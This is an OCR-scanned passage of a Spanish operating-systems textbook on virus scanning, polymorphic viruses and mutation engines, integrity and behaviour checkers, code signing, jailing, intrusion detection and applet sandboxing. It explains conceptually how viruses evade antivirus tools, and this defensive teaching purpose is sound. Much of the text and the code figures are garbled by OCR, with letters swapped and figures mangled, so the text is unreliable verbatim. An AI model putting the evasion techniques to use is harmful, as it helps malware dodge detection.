inversa al código. Desde luego que para ejecutarse, el virus tiene que descifrarse a sí mismo prime¬ 
ro, por lo que también necesita una función de descifrado en el archivo. 

Este esquema no es perfecto debido a que los procedimientos de compresión, descompresión, 
cifrado y descifrado son los mismos en todas las copias, y el programa antivirus los puede utilizar 
como la firma del antivirus a buscar en el proceso de exploración. Es fácil ocultar los procedimien¬ 
tos de compresión, descompresión y cifrado: sólo se cifran junto con el resto del virus, como se 
muestra en la figura 9-32(e). Sin embargo, el código de descifrado no se puede cifrar, ya que se tie- 
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ne que ejecutar en el hardware para descifrar el resto del virus, por lo que debe estar presente en tex¬ 
to simple. Los programas antivirus ya saben esto, por lo que buscan el procedimiento de descifrado. 


El archivo es más largo 


Virus 


Programa 

ejecutable 


Encabezado 


Programa 

ejecutable 


Encabezado 


(a) (b) 


Tamaño original Tamaño origina 

Tamaño origina 



y/////////////// 

/// /A/A 



Virus 

■ Virus 

gSin utilizar^ 


cifrado 


cifrado 



Descompresor 


Descompresor 



Compresor 


Compresor 

Virus 


Cifrador 


Cifrador 

Descompresor 


Clave 


Clave 

Compresor 


Descifrador 


Descifrador 

Programa 


Programa 


Programa 

ejecutable 


ejecutable 


ejecutable 

comprimido 


comprimido 


comprimido 

Encabezado 


Encabezado 


Encabezado 

(c) 

(d) 

(e) 


> Cifrado 


Figura 9-32. (a) U n programa, (b) U n programa infectado, (c) U n programa infecta¬ 
do comprimido, (d) U n virus cifrado, (e) U n virus comprimido con el código de com¬ 
presión cifrado. 


No obstante, Virgilio disfruta al tener la última palabra, por lo que procede de la siguiente ma¬ 
nera. Suponga que el procedimiento de descifrado necesita realizar el siguiente cálculo: 

X = (A-rB-HC-4) 

En la figura 9-33(a) se muestra el código ensamblador directo de este cálculo para una computado¬ 
ra genérica de dos direcciones. La primera dirección es el origen; la segunda es el destino, por lo 
que MOV A,Ri mueve la variable A al registro ri. El código en la figura 9.33(b) hace lo mismo, 
sólo que con menos eficiencia debido a las instrucciones nop (ninguna operación) que están inter¬ 
caladas con el código real. 


MOV A.Rl 

ADDC.ni 
SUB *4,ni 
MOV 




MOV A.Rl 
hlOP 

ADDB.Rl 

NOP 

ADD c.m 
NOP 

SUB M,Ri 
NOP 

MOV Rl.X. 

m 


MOV A.m 
ADDMQ.Pl 
AODB.R1 
Ofl Rl.fli 
ADDC.Rl 
SHL 10, 
SUB i^.Rli 
JMP .*í 
MDVR1,X 

fcj 


MOV A.Rl 
Oñ Ftl.Rt 
ADD 6.RI 
MOV B1 .RS 
ADO C.fli 
SHL Rt,0 
SUB H.R1 
APO FI5,R5 
MOV Pll.íí 
MOV Fli.Y 


MOV A.Rl 
TSTRI 
ADDC.RI 
MOV R1.F15 
ADO B.RI 
CMP n2.R5 
SUB f4,ni 
JMP «1 
MOV R1,)[ 
MOV R*,Y 

m 


Figura 9-33. Ejemplos de un virus polimórfico. 
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Pero aún no terminamos. También es posibie disfrazar ei código de descifrado. Hay muchas 
formas de representar ia instrucción nop. Por ejempio, sumar 0 a un registro, apiicar un OR a ia mis¬ 
ma instrucción, despiazaria a ia izquierda 0 bits y saitar a ia siguiente instrucción; todos esos son 
procedimientos que no hacen nada. Así, ei programa de ia figura 9-33(c) es iguai en función queei 
de ia figura 9-33(a). Ai copiarse a sí mismo, ei virus podría utiiizar ia figura 9-33(c) en vez de ia 
9-33(a) y seguir funcionando más tarde, ai ser ejecutado. Un virus que muta en cada copia se cono¬ 
ce como virus politnórfico. 

Ahora suponga que no se necesita rs para nada durante esta pieza dei código. Entonces, ia fi¬ 
gura 9-33(d) es también equivaiente a ia 9-33(a). Por úitimo, en muchos casos es posibie intercam¬ 
biar instrucciones sin cambiar io que hace ei programa, por io que terminamos con ia figura 9-33(e) 
como otro fragmento de código que tiene una equivaiencia iógica con ia figura 9-33(a). U na pieza 
de código que puede mutar una secuencia de instrucciones de máquina sin cambiar su funcionaii- 
dad se conoce como motor de mutación, y ios virus sofisticados io contienen para mutar ei desci¬ 
frador de una copia a otra. Las mutaciones pueden consistir en ia inserción de código inútii pero 
inofensivo, en ia permutación de instrucciones, ei intercambio de registros y ei reempiazo de una 
instrucción con otra equivaiente. Ei mismo motor de mutación puede ocuitarse, para io cuai se ci¬ 
fra junto con ei cuerpo dei virus. 

Es mucho pedir que ei pobre software antivirus comprenda que ias figuras 9-33 (a) a (e) son fun- 
cionaimente equivaientes, en especiai si ei motor de mutación tiene muchos trucos bajo su manga. Ei 
software antivirus puede anaiizar ei código para ver io que hace, e inciuso puede tratar de simuiar ia 
operación dei código, pero debemos recordar que puede tener miies de virus y miies de archivos que 
anaiizar, por io que no tiene mucho tiempo en cada prueba, o se ejecutará con una ientitud terribie. 

Como información adicionai, se inciuyó ia operación de aimacenamiento en ia variabie Y sóio 
para que fuera más difíci i detectar ei hecho de queei código reiacionado con rs es código muerto: 
es decir, no hace nada. Si otros fragmentos de código ieen ei vaior de Y y escriben en esa variabie, 
ei código tendrá una apariencia perfectamente iegítima. U n motor de mutación bien escrito que ge¬ 
nere código poiimórfico de buena caiidad puede dar muchos doiores de cabeza a ios escritores de 
software antivi rus. Ei único iado positivo es que dicho motor es difíci i de escribir, por io cuai todos 
ios amigos de Virgiiio utiiizan su código, io que significa que no hay tantos virus distintos en cir- 
cuiación; por io menos no todavía. 

Hasta ahora sóio hemos habiado de tratar de reconocer virus en archivos ejecutabies infecta¬ 
dos. Además de esto, ei expiorador de virus tiene que comprobar ei M BR, ios sectores de arranque, 
ia iista de sectores defectuosos, ia memoria fiash, ia memoria CM OS y otras cosas más, pero ¿qué 
pasa si hay un virus residente en memoria que se esté ejecutando en ese momento? No será detec¬ 
tado. Peor aún, suponga que ei virus en ejecución monitorea todas ias iiamadas ai sistema. De esta 
forma puede detectar con faciiidad que ei programa antivirus está ieyendo ei sector de arranque (pa¬ 
ra comprobar si hay virus). Para frustrar ai programa antivirus, ei virus no reaiiza ia iiamada ai sis¬ 
tema. En vez deeiio, sóio devueiveei verdadero sector de arranque desde su iugar ocuito en ia iista 
de bioques defectuosos. También hace una anotación mentai para voiver a infectar todos ios archi¬ 
vos cuando ei expiorador de virus termine. 

Para evitar ser engañado por un virus, ei programa antivirus podría hacer iecturas directas en 
ei disco, pasando por aito ai sistema operativo. Sin embargo, para eiio se requiere tener drivers de 
dispositivos para ios discos IDE, SCSI y otros discos comunes, con io cuai ei programa antivirus 
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sería menos portátil y estaría sujeto a fallas en las computadoras con discos inusuales. Además, co¬ 
mo es posible pasar por alto al sistema operativo para leer el sector de arranque, pero no para leer 
todos los archivos ejecutables, también hay cierto peligro de que el virus pueda producir datos frau¬ 
dulentos sobre los archivos ejecutables. 

Comprobadores de integridad 

L a comprobación de integridad es un método completamente distinto para detectar virus. Un pro¬ 
grama antivirus que funciona de esta manera explora primero el disco duro en busca de virus. Una 
vez que está convencido de que el disco está limpio, calcula una suma de comprobación para cada 
archivo ejecutable. El algoritmo de sumas de comprobación podría ser algo tan simple como tratar 
a todas las palabras en el texto del programa como enteros de 32 o 64 bits y sumarlas, pero también 
podría ser un hash criptográfico que sea casi imposible de invertir. Después escribe en un archivo 
llamado sumacomp la lista de sumas de comprobación para todos los archivos relevantes en un di¬ 
rectorio, en ese directorio. La próxima vez que se ejecuta, vuelve a calcular todas las sumas de com¬ 
probación y verifica que coincidan con lo que hay en el archivo sumacomp. Un archivo infectado 
en la lista se podrá identificar de inmediato. 

El problema es que Virgilio no va a estar de brazos cruzados ante esto. Puede escribir un virus 
que elimine el archivo de comprobación. O peor aún, puede escribir un virus que calcule la suma 
de comprobación del archivo infectado y reemplace la entrada anterior en el archivo de sumas de 
comprobación. Para protegerse contra este tipo de comportamiento, el programa antivirus puede 
tratar de ocultar el archivo de sumas de comprobación, pero no es probable que esto vaya a funcio¬ 
nar debido a que Virgilio puede estudiar el programa antivirus con cuidado antes de escribir el vi¬ 
rus. Una mejor idea sería firmarlo digitalmente para que sea más fácil detectar su alteración. En 
teoría, la firma digital debe implicar el uso de una tarjeta inteligente con una clave almacenada en 
forma externa, que los programas no puedan alcanzar. 

Comprobadores del comportamiento 

L a comprobación del comportamiento es la tercera estrategia que utiliza el software antivirus. Con 
este método, el programa antivirus vive en memoria mientras que la computadora está funcionando, 
y atrapa por sí solo todas las llamadas al sistema. La idea es que pueda entonces moni torear toda la 
actividad y trate de atrapar algo que se vea sospechoso. Por ejemplo, ningún programa normal debe¬ 
ría tratar de sobrescribir el sector de arranque, por lo que es casi un hecho que un intento por hacer 
esto se debe a un virus. De igual forma, cambiar la memoria flash es una actitud muy sospechosa. 

Pero también hay casos menos claros. Por ejemplo, sobrescribir un archivo ejecutable es algo 
peculiar (a menos que lo haga un compilador). Si el software antivirus detecta dicha escritura y emi¬ 
te una advertencia, se espera que el usuario sepa si tiene sentido sobrescribir un ejecutable en el con¬ 
texto del trabajo actual. De manera similar, el que Word sobrescriba un archivo .doc con un nuevo 
documento lleno de macros no es necesariamente el trabajo de un virus. En Windows, los progra¬ 
mas se pueden separar de su archivo ejecutable y permanecer residentes en memoria mediante el 
uso de una llamada al sistema especial. Como dijimos antes, esto podría ser legítimo pero de todas 
formas sería útil una advertencia. 
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Los virus no tienen que permanecer pasivos en espera de que un programa antivirus ios eiimi- 
ne, como ei ganado que se iieva a sacrificar. Pueden responder ai ataque. Se puede iievar a cabo una 
bataiia bastante acaiorada si un virus residente en memoria y un antivirus se encuentran en ia mis¬ 
ma computadora. Hace años había un juego iiamado Core Wars en ei que se enfrentaban dos pro¬ 
gramadores, y cada uno de eiios coiocaba un programa en un espacio de direcciones vacío. Los 
programas tomaban turnos para sondear ia memoria, y ei objetivo dei juego era iocaiizar y borrar 
ai oponente antes de que éi hiciera io mismo. La confrontación entre virus y antivirus es aigo simi- 
iar, sóio que ei campo de bataiia es ia máquina de un pobre usuario que en reaiidad no quiere que 
ia confrontación ocurra ahí. Lo que es peor, ei virus tiene una ventaja ya que su escritor puede ave¬ 
riguar muchos detaiies sobre ei programa antivirus con sóio comprar una copia. Desde iuego que 
cuando ei virus se iibera, ei equipo dei antivirus puede modificar su programa para obiigar a Virgi- 
iio a comprar una nueva copia. 

Cómo evitar los virus 

Toda buena historia necesita una moraieja; ia de esta historia es 

M ejor seguro que arrepentido. 

Es mucho más fácii evitar ios virus que tratar de rastreados después de que han infectado una compu¬ 
tadora. A continuación veremos unos cuantos iineamientos para ios usuarios individuaies, pero tam¬ 
bién aigunas cosas que ia industria en generai puede iievar a cabo para reducir ios probiemas de una 
forma consi derabie. 

¿Qué pueden hacer ios usuarios para evitar una infección de un virus? En primer iugar, eiegir 
un sistema operativo que ofrezca un aito nivei de seguridad, con un iímite sóiido entre ei modo de 
kernei y ei modo de usuario, y contraseñas separadas para cada usuario, además dei administrador 
dei sistema. Bajo estas condiciones, un virus que se escabuiia deaiguna forma no podrá infectar ios 
archivos binarios dei sistema. 

En segundo iugar, pueden instaiar sóio software iegai que se compre de aigún fabricante con- 
fiabie. A unque, esto no garantiza nada, sí ayuda mucho, ya que han ocurrido casos en que ios em- 
pieados descontentos introducen virus en un producto de software comerciai. Es riesgoso descargar 
software de sitios Web y tabieros de anuncios eiectrónicos. 

En tercer iugar, pueden comprar un buen paquete de software antivirus y usado según ias indi¬ 
caciones. Hay que asegurarse de obtener actuaiizaciones periódicas dei sitio Web dei fabricante. 

En cuarto iugar, no deben hacer ciic en ios adjuntos de correo eiectrónico y deben pedir a ios 
demás que no Íes envíen adjuntos. Ei correo eiectrónico que se envía como texto ASCII simple 
siempre es seguro, pero los adjuntos pueden contener virus que se activan al abrirlos. 

En quinto lugar, pueden realizar copias frecuentes de los archivos clave en un medio externo, 
como disco flexible, CD grabableo cinta. Es conveniente mantener varias generaciones de cada ar¬ 
chivo en una serie de medios de respaldo. De esta forma, si el usuario descubre un virus, puede te¬ 
ner la oportunidad de restaurar los archivos al estado que tenían antes de ser infectados. No es de 
mucha ayuda restaurar el archivo infectado de ayer, pero la versión de la semana pasada tal vez si 
sea de ayuda. 
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En sexto y último lugar, deben resistir la tentación de descargar y ejecutar el nuevo software os¬ 
tentoso y gratuito de una fuente desconocida. Tal vez haya una razón por la cual sea gratuito: que el 
fabricante desea que nuestra computadora se una a su ejército de zombies. A unque si usted tiene soft¬ 
ware de máquina virtual, es seguro ejecutar software desconocido dentro de ella. 

La industria también debería tomar en serio la amenaza de los virus y modificar algunas prác¬ 
ticas peligrosas. En primer lugar, los sistemas operativos deben ser simples. Entre más característi¬ 
cas espectaculares tengan, habrá más hoyos de seguridad. Esto es un hecho de la vida. 

En segundo lugar, hay que olvidarse del contenido activo. Desde el punto de vista de la segu¬ 
ridad, es un desastre. Para ver un documento que alguien nos envió, no tiene que ser obligatorio eje¬ 
cutar su programa. Por ejemplo, los archivos] PEG no contienen programas y, por ende, no pueden 
contener virus. Todos los documentos deberían ser así. 

En tercer lugar, debe haber una forma de proteger contra escritura ciertos cilindros del disco, 
para evitar que los virus infecten los programas que contienen. Esta protección se podría implemen- 
tar mediante un mapa de bits dentro del controlador que liste los cilindros protegidos contra escri¬ 
tura. El mapa sólo debería modificarse cuando el usuario active un interruptor mecánico en el panel 
frontal de la computadora. 

En cuarto lugar, la memoria flash es una buena idea pero sólo debería modificarse al activar un 
interruptor externo, algo que sólo ocurrirá cuando el usuario instale de manera consciente una ac¬ 
tualización del BIOS. Desde luego que nada de esto se tomará con seriedad sino hasta que llegue 
un virus realmente grande. Por ejemplo, uno que ataque el mundo financiero y restablezca todas las 
cuentas bancadas a 0. Claro que para entonces será demasiado tarde. 

9.8.3 Firma de código 

Un método completamente distinto de impedir que el malware entre en la computadora (recuerde: 
defensa en profundidad) es ejecutar sólo el software de distribuidores confiables que no tenga mo¬ 
dificaciones. U na délas cuestiones que surgen con mucha rapidez es la forma en que el usuario pue¬ 
de saber que el software realmente proviene del distribuidor correcto, y cómo puede saber que no 
se ha modificado desde que salió de la fábrica. Esta cuestión es muy importante cuando se descar¬ 
ga software de tiendas en línea con una reputación desconocida, o al descargar controles activeX de 
los sitios Web. Si el control activeX proviene de una empresa de software reconocida, es poco pro¬ 
bable que contenga un caballo deTroya por ejemplo, pero ¿cómo puede estar seguro el usuario? 

Un método que se utiliza con mucha frecuencia es la firma digital, como se describe en la sec¬ 
ción 9.2.4. Si el usuario sólo ejecuta programas, complementos, drivers, controles activeX y otros 
tipos de software escritos y firmados por fuentes confiables, las probabilidades detener problemas 
son mucho menores. Sin embargo, la consecuencia de este método es que probablemente el nuevo 
juego espectacular, ingenioso y gratuito de Snarky Software sea demasiado bueno como para ser 
verdad, y no aprobará la prueba de la firma ya que no sabemos quién está detrás del juego. 

La firma de código se basa en la criptografía de clave pública. Un distribuidor de software ge¬ 
nera un par (clave pública, clave privada), y pone la primera clave a disposición del público pero 
guarda la segunda clave con recelo. Para firmar una pieza de software, el distribuidor primero calcu¬ 
la una función de hash del código para obtener un número de 128,160 o 256 bits, dependiendo de si 
se utiliza MD5, SFIA-1 o SFIA-256. Después, para firmar el valor de hash lo cifra con su clave 
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privada (en realidad, la descifra utilizando la notación de la figura 9-3). Esta firma acompaña al 
software a cualquier lado que vaya. 

Cuando el usuario recibe el software, se le aplica la función de hash y se guarda el resultado. 
Después descifra la firma que lo acompaña mediante la clave pública del distribuidor y compara el 
resultado que tiene el distribuidor de la función de hash con el resultado que acaba de calcular. Si 
coinciden, el código se acepta como genuino. En caso contrario, se rechaza como una falsificación. 
Debido a los cálculos matemáticos involucrados, es muy difícil que alguien pueda alterar el softwa¬ 
re de tal forma que su función de hash coincida con la función de hash que se obtiene al descifrar 
la firma genuina. Es igual de difícil generar una nueva firma falsa que coincida sin tener la clave 
privada. En la figura 9-34 se ilustran los procesos de firma y verificación. 


Distribuidor de software 

- Generación de firma 


H = hash(Programa) 
Firma = cifrar(FI) 


Programa 

Firma 


Usuario 


Programa 

Firma 


Verificación de firma 

FU = hash(Programa) 

FI2 = descifrar{Firma) 

Acepta ei programa si FU = FI2 



Figura 9-34. Cómo funciona la firma de código. 

Las páginas Web pueden contener código como los controles activeX, pero también código en 
diversos lenguajes de secuencias de comandos. A menudo este código está firmado, en cuyo caso 
el navegador examina la firma de manera automática. Claro que para verificarla el navegador nece¬ 
sita la clave pública del distribuidor de software, que por lo general se incluye con el código junto 
con un certificado firmado por una CA que responde por la autenticidad de la clave pública. Si el 
navegador ya tiene guardada la clave pública de la CA, puede verificar el certificado por su cuen¬ 
ta. Si el certificado está firmado por una CA que el navegador desconoce, aparecerá un cuadro de 
diálogo preguntando al usuario si desea aceptar o no el certificado. 

9.8.4 Encarcelamiento 

Hay un viejo dicho ruso que dice: "Confiar pero verificar". Sin duda, se tenía al software en men¬ 
te cuando se acuñó este viejo dicho ruso. Aunque una pieza de software esté firmada, es conveniente 
verificar que su comportamiento sea correcto. En la figura 9-35 se muestra una técnica para hacer 
esto, conocida como encarcelamiento. 

El programa recién adquirido se ejecuta como un proceso que en la figura se denomina "prisione¬ 
ro". El "carcelero" es un proceso confiable (sistema) que monitorea el comportamiento del prisionero. 
Cuando un proceso encarcelado realiza una llamada al sistema, en vez de que se ejecute esta llamada 
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Figura 9-35. La operación de una cárcel. 


el control se transfiere al carcelero (por medio de una trampa en el kernel), y se leenvía el número de 
la llamada al sistema junto con sus parámetros. Después el carcelero decide si se debe permitir o 
no la llamada al sistema. Por ejemplo, si el proceso encarcelado trata de abrir una conexión de red con 
un host remoto desconocido para el carcelero, éste puede rechazar la llamada y eliminar al prisione¬ 
ro. Si la llamada al sistema es aceptable, el carcelero informa al kernel y éste lleva a cabo la llamada. 
De esta forma se puede atrapar el comportamiento erróneo antes de que ocasione problemas. 

Existen varias implementaciones del encarcelamiento. Van 't Noordende y sus colaboradores 
(2007) describieron una implementación que funciona en casi cualquier sistema UNIX sin necesidad 
de modificar el kernel. En resumen, el esquema utiliza las herramientas de depuración normales de 
UNIX, donde el carcelero es el depurador y el prisionero el depurado. Bajo estas circunstancias, el 
depurador puede pedir al kernel que encapsule al depurado y le pase todas sus llamadas al sistema 
para inspeccionarlas. 

9.8.5 Detección de intrusos basada en modelos 

Otro método para defender una máquina es instalar un IDS Intrusión Detection System (Sistema de 
detección de intrusos). Flay dos tipos básicos de IDS: uno se concentra en inspeccionar los paque¬ 
tes de red entrantes y el otro se enfoca en buscar anomalías en la CPU. En la sección sobrefirewails 
mencionamos brevemente el IDS de red; ahora hablaremos un poco sobre un IDS basado en host. 
Debido a las limitaciones de espacio, no podemos contemplar los diversos tipos de IDS basado en 
host. En vez de ello veremos un bosquejo breve de un tipo de IDS, para que el lector tenga una idea 
sobre su funcionamiento. A ese IDS se le conoce como detección de intrusos basada en modelos 
estáticos (Wagner y Dean, 2001), y se puede implementar mediante el uso de la técnica de encar¬ 
celamiento que describimos en la sección anterior, entre otras formas. 

En la figura 9-36(a) podemos ver un pequeño programa que abre un archivo llamado datos y 
lo lee, un carácter a la vez, hasta que llega a un byte cero y entonces imprime el número de bytes 
distintos de cero que se encuentran al inicio del archivo, y después termina. En la figura 9-36(b) po¬ 
demos ver un gráfico de las llamadas al sistema realizadas por este programa (en donde imprimir 
llama a write). 

¿Qué nos indica este gráfico? Para empezar, la primera llamada al sistema que hace el progra¬ 
ma bajo cualquier condición es siempre open. La siguiente es read o write, dependiendo de la 
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int ma¡n{¡nt argc *char argv[]) 

{ 

int fd, n = 0; 
char buf[1]; 

fd = openC'datos", 0); 
if (fd < 0) { 

printfC'Archivo de datos defectuoso\n"); 
exit(1); 

} else { 
while (1) { 

read(fd, buf, 1); 
if (buf[0] == 0) { 
ciose{fd); 

printfC'n = %d\n'', n); 
exit(O); 

} 

n = n + 1; 

} 

} 

} 

(a) (b) 

Figura 9-36. (a) Un programa, (b) Gráfico de llamadas al sistema para (a). 


bifurcación de if que se seleccione. Si la segunda llamada es write, significa que no se pudo abrir 
el archivo y la siguiente llamada debe ser exit. Si la segunda llamada es read, puede haber un nú¬ 
mero arbitrariamente grande de llamadas adicionales a read y, en un momento dado, llamadas a 
cióse, write y exit. En ausencia de un intruso, no hay más secuencias posibles. Si el programa es 
encarcelado, el carcelero verá todas las llamadas al sistema y podrá verificar con facilidad que la 
secuencia sea válida. 

A hora suponga que alguien encuentra un error en este programa y activa un desbordamiento de 
búfer para insertar y ejecutar código hostil. Cuando se ejecute el código hostil, es muy probable que 
ejecute una secuencia distinta de llamadas al sistema. Por ejemplo, podría tratar de abrir algún ar¬ 
chivo que desee copiar, o podría abrir una conexión de red para telefonear a casa. En la primera lla¬ 
mada al sistema que no encaje en el patrón, el carcelero sabrá en definitiva que ha ocurrido un 
ataque y puede tomar acción, como eliminar el proceso y alertar al administrador del sistema. De 
esta forma, los sistemas de detección de intrusos pueden detectar los ataques mientras están ocu¬ 
rriendo. El análisis estático de las llamadas al sistema es sólo una de las formas en que puede fun¬ 
cionar un IDS. 

Cuando se utiliza este tipo de detección de intrusión basada en un modelo estático, el carcele¬ 
ro tiene que conocer el modelo (es decir, el gráfico de llamadas al sistema). La forma más simple 
para aprender esto es hacer que el compilador lo genere, que el autor del programa lo firme y ad¬ 
junte su certificado. De esta forma, cualquier intento por modificar el programa ejecutable por ade¬ 
lantado se detectará al momento de su ejecución, debido a que el comportamiento actual no 
coincidirá con el comportamiento firmado esperado. 
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Por desgracia, es posible que un atacante inteligente lance lo que se conoce como ataque de 
mímica, en el cual el código insertado realiza las mismas llamadas al sistema que se supone debe 
hacer el programa (Wagner y Soto, 2002), por lo que se necesitan modelos más sofisticados que los 
que sólo rastrean las llamadas al sistema. Aún así, como parte de la defensa en profundidad, un IDS 
puede hacer muy bien su papel. 

Un IDS basado en modelos no es el único tipo existente. Flay muchos IDS que utilizan un con¬ 
cepto llamado tarro de miel, una trampa para atraer y atrapar crackers y malware. Por lo general 
es una máquina aislada con pocas defensas y un contenido en apariencia interesante y valioso, lis¬ 
to para ser recolectado. Las personas que preparan el tarro de miel monitorean cuidadosamente 
cualquier ataque para tratar de aprender más sobre la naturaleza del mismo. A Igunos IDS ponen sus 
tarros de miel en máquinas virtuales, para evitar daños en el sistema actual subyacente. Es obvio 
que el malware tratará de determinar si se está ejecutando en una máquina virtual, como se mencio¬ 
nó antes. 


9.8.6 E ncapsulamiento de código móvil 

Los virus y gusanos son programas que entran en una computadora sin que el propietario se entere 
y contra su voluntad. Sin embargo, algunas veces las personas importan y ejecutan código extraño 
en sus máquinas, de una manera más o menos voluntaria. En el pasado distante (que en el mundo 
de Internet significa hace unos cuantos años), la mayoría de las páginas Web eran sólo archivos de 
FITML estáticos con unas cuantas imágenes asociadas. En la actualidad cada vez hay más pági¬ 
nas Web que contienen pequeños programas conocidos como applets. Cuando se descarga una pá¬ 
gina Web que contiene applets, el sistema obtiene estos applets y los ejecuta. Por ejemplo, un applet 
podría contener un formulario para que lo llene el usuario, junto con ayuda interactiva para ayudar¬ 
lo en el proceso de llenado. Al llenar el formulario, éste se podría enviar a alguna ubicación en In¬ 
ternet para procesarlo. Los formularios fiscales, de pedidos de productos personalizados y muchos 
otros tipos de formularios se podrían beneficiar de este método. 

Los agentes son otro ejemplo en el que los programas se envían de una máquina a otra para 
ejecutarlos en la máquina de destino. Los agentes son programas que un usuario inicia para realizar 
cierta tarea y después reportan sus resultados. Por ejemplo, se le puede pedir a un agente que revi¬ 
se algunos sitios Web sobre viajes para encontrar el vuelo más económico de Amsterdam a San 
Francisco. Al llegar a cada sitio, el agente se ejecuta ahí, obtiene la información que necesita y des¬ 
pués avanza al siguiente sitio Web. Al terminar su trabajo, puede regresar a casa y reportar todo lo 
que aprendió. 

Un tercer ejemplo de código móvil es un archivo PostScript que se va a imprimir en una im¬ 
presora PostScript. En realidad, un archivo PostScript es un programa en el lenguaje de programa¬ 
ción PostScript que se ejecuta dentro de la impresora. Por lo general, indica a la impresora que 
dibuje ciertas curvas y luego las rellene, pero puede hacer cualquier otra cosa también. Los applets, 
los agentes y PostScript son sólo tres ejemplos de código móvil, pero hay muchos más. 

Después del extenso análisis sobre virus y gusanos que vimos antes, debe estar claro en estos 
momentos para el lector que la decisión de permitir que se ejecute código extraño en su máquina 
es algo más que un pequeño riesgo. Sin embargo, algunas personas quieren ejecutar estos programas 
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extraños, por lo que surge la siguiente pregunta: "¿Se puede ejecutar ei código móvii con seguri¬ 
dad?". La respuesta corta es: "Sí, pero no con faciiidad". Ei probiema fundamentai es que cuando 
un proceso importa un appiet u otro código móvii en su espacio de direcciones y io ejecuta, ese có¬ 
digo se ejecuta como parte de un proceso váiido de usuario, y tiene todo ei poder que tiene ei usua¬ 
rio, inciuyendo ia habiiidad de ieer, escribir, borrar o cifrar ios archivos de disco dei usuario, de 
enviar por correo eiectrónico ios datos a países iejanos, y mucho más. 

Hace mucho tiempo, ios sistemas operativos desarroiiaron ei concepto dei proceso para crear 
paredes entre ios usuarios. La idea es que cada proceso tenga su propio espacio de direcciones 
protegido y su propio UID para que pueda acceder a ios archivos y otros recursos que ie pertene¬ 
cen, pero no a otros usuarios. Ei concepto de proceso no es útii para proveer protección contra 
una parte dei proceso (ei appiet) y dei resto. Los hiios permiten varios hiios de controi dentro de un 
proceso, pero no hacen nada por proteger a un hiio contra otro. 

En teoría, ayuda un poco ejecutar cada appiet como un proceso separado, pero a menudo es im- 
posibie. Por ejempio, una página Web puede contener dos o más appiets que interactúen entre sí, y 
que interactúen con ios datos en ia página Web. Tai vez ei navegador Web necesite interactuar con 
ios appiets, para iniciados y detenerios, proporcionaries datos, etcétera. Si cada appiet se coioca en 
su propio proceso, todo esto no funcionará. Además, si un appiet se coioca en su propio espacio de 
direcciones no ie es más difícii robar o dañar datos. Si acaso, es más fácii debido a que nadie está 
observándoio ahí. 

Se han propuesto e impiementado varios nuevos métodos para iidiar con ios appiets (y con ei 
código móvii en generai). A continuación anaiizaremos dos de estos métodos: ias cajas de arena y 
ia interpretación. También se puede utiiizar ia firma de código para verificar ei origen dei appiet. 
Cada uno tiene sus propias ventajas y desventajas. 


Cajas de arena 

Ei primer método, conocido como caja de arena, trata de confinar cada appiet a un rango iimitado 
de direcciones virtuaies que se impiementan en tiempo de ejecución (Wahbe y coiaboradores, 
1993). La función de este método es dividir ei espacio de direcciones virtuaies en regiones de iguai 
tamaño, a ias cuaies se Íes conoce como cajas de arena. Cada caja de arena debe tener ia propiedad 
de que todas sus direcciones comparten cierta cadena de bits de orden superior. Podríamos dividir 
un espacio de direcciones de 32 bits en 256 cajas de arena con iímites de 16 M B, de manera que ios 
8 bits superiores de todas ias direcciones dentro de una caja de arena sean comunes. De iguai for¬ 
ma podríamos tener 512 cajas de arena con iímites de 8 M B, en donde cada caja de arena tenga un 
prefijo de dirección de 9 bits. Hay que eiegir ei tamaño de ia caja de arena de manera que tenga ei 
tamaño suficiente para contener ei appiet más grande sin desperdiciar demasiado espacio de direc¬ 
ciones virtuaies. La memoria física no es un probiema si hay paginación bajo demanda, y esto casi 
siempre es así. Cada appiet recibe dos cajas de arena, una para ei código y otra para ios datos, co¬ 
mo se iiustra en ia figura 9-37(a) para ei caso de 16 cajas de arena de 16 M B cada una. 

La idea básica detrás de una caja de arena es garantizar que un appiet no pueda saitar ai códi¬ 
go que esté fuera de su caja de arena de código, y que no pueda hacer referencia a ios datos que es¬ 
tán fuera de su caja de arena de datos. La razón de tener dos cajas de arena es evitar que un appiet 
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Dirección 
virtual 
en MB 


256 

224 

192 

160 

128 

96 

64 

32 

0 




Monto de éieucias 








Datos 2 

Códiqo 2 



Datos 1 

Códiqo 1 


<- Monitor de 
referencias 
para comprobar 
el sistema 


Applet 2 


Applet 1 


(a) 


MOV R1, SI 
SHR #24, SI 
CMPS1, S2 
TRAPNE 
JMP (Rl) 


(b) 


Figura 9-37. (a) La memoria dividida en cajas de arena de 16 M B. (b) U na forma de 
comprobar ia vaiidez de una instrucción. 


modifique su código durante la ejecución para evitar estas restricciones. Al evitar que se almacenen 
datos en la caja de arena de código, eliminamos el peligro del código que se modifica a sí mismo. 
M ientras que un applet esté confinado de esta forma, no podrá dañar al navegador ni a otros applets, 
ni plantar virus en memoria o realizar cualquier otro tipo de daño a la memoria. 

Tan pronto como se carga un applet, se reubica para que empiece al inicio de su caja de arena. 
Después se realizan comprobaciones para ver si las referencias de código y de datos están confina¬ 
das en la caja de arena apropiada. En el siguiente análisis sólo veremos las referencias de código 
(como las instrucciones JMP y cali), pero lo mismo ocurre con las referencias de datos. Las instruc¬ 
ciones jmp estáticas que utilizan direccionamiento directo son fáciles de comprobar: ¿La dirección 
de destino se encuentra dentro de los límites de la caja de arena de código? De manera similar, las 
instrucciones JMP relativas también se pueden comprobar con facilidad. Si el applet ti ene código que 
trata de salir de la caja de arena de código, se rechaza y no se ejecuta. De igual forma, si un applet 
intenta acceder a los datos fuera de la caja de arena de datos, se rechaza. 

La parte difícil son las instrucciones jmp dinámicas. La mayoría délas máquinas tienen una ins¬ 
trucción en la que la dirección del salto se calcula en tiempo de ejecución, se coloca en un registro 
y después se hace el salto hacia esa dirección de manera indirecta: por ejemplo, mediante jmp (ri) 
para saltar a la dirección que contiene el registro 1. La validez de dichas instrucciones se debe 
comprobar en tiempo de ejecución. Para ello hay que insertar código justo antes del salto indirec¬ 
to para evaluar la dirección de destino. En la figura 9-37(b) se muestra un ejemplo de esta prueba. 
Recuerde que todas las direcciones válidas tienen los mismos k bits superiores, por lo que este 
prefijo se puede almacenar en un registro reutilizable, por ejemplo, en S 2 . El mismo applet no pue¬ 
de utilizar ese registro, para lo cual tal vez haya que volver a escribir el applet para que evite este 
registro. 
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El código funciona de ia siguiente manera: primero se copia ia dirección de destino que se es¬ 
tá inspeccionando a un registro reutiiizabie, si. Después este registro se despieza a ia derecha por 
ei número preciso de bits para aisiar ei prefijo común en si. A continuación, ei prefijo aisiado se 
